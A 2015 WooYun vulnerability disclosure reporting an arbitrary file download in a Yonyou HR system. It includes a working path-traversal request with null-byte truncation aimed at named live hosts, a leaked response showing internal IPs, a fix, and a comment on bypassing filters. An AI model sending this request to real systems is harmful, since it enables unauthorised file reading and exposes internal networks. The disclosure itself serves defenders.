当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096676

漏洞标题:用友某系统任意文件下载

相关厂商:用友软件

漏洞作者: ToySweet

提交时间:2015-02-10 22:50

修复时间:2015-05-12 09:00

公开时间:2015-05-12 09:00

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-14: 细节向第三方安全合作伙伴开放
2015-04-07: 细节向核心白帽子及相关领域专家公开
2015-04-17: 细节向普通白帽子公开
2015-04-27: 细节向实习白帽子公开
2015-05-12: 细节向公众公开

简要描述:

用友某系统任意文件下载

详细说明:

用友人力资源管理任意文件下载
之前挖过的一个注入,5个为例子吧
218.2.115.222:8088
120.40.72.157:4001
219.140.193.253
zhaopin.cnooc.com.cn
发送的数据包

GET //hrss/dorado/smartweb2.loadConst.d?language=zh&country=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts%00.html HTTP/1.1
Host: 218.2.115.222:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=D8D50F9A857CE283FA65DDBD3676A014
Connection: keep-alive


返回包

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A639145A4865CCAD8371CA270A54AC3A; Path=/hrss
content-disposition: attachment;filename="const.js"
Last-Modified: Thu, 09 Oct 2014 06:37:36 GMT
Content-Type: application/octet-stream
Date: Tue, 10 Feb 2015 12:00:54 GMT
Content-Length: 153
var 192.168.4.2="sqldatabase2";
var 127.0.0.1="localhost";
var 192.168.4.9="sql-cluster";
var 192.168.4.3="sqldatabase1";
var 192.168.4.44="pt-erptest";


country 和 language字段都存在任意文件下载

漏洞证明:

任意文件下载.png


任意文件下载.png


任意文件下载.png


修复方案:

通过递归过滤\和..等特殊字符,防止00截断

版权声明:转载请注明来源 ToySweet@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-11 08:59

厂商回复:

多谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-12 17:21 | sec ( 路人 | Rank:5 漏洞数:2 | none for security)

    为什么是双斜线?求解惑

  2. 2015-05-12 18:28 | sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)

    @sec 转义啊,人家服务端做了一次过滤了,你再加一个斜线,正好完美的避开人家的过滤。。。。!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!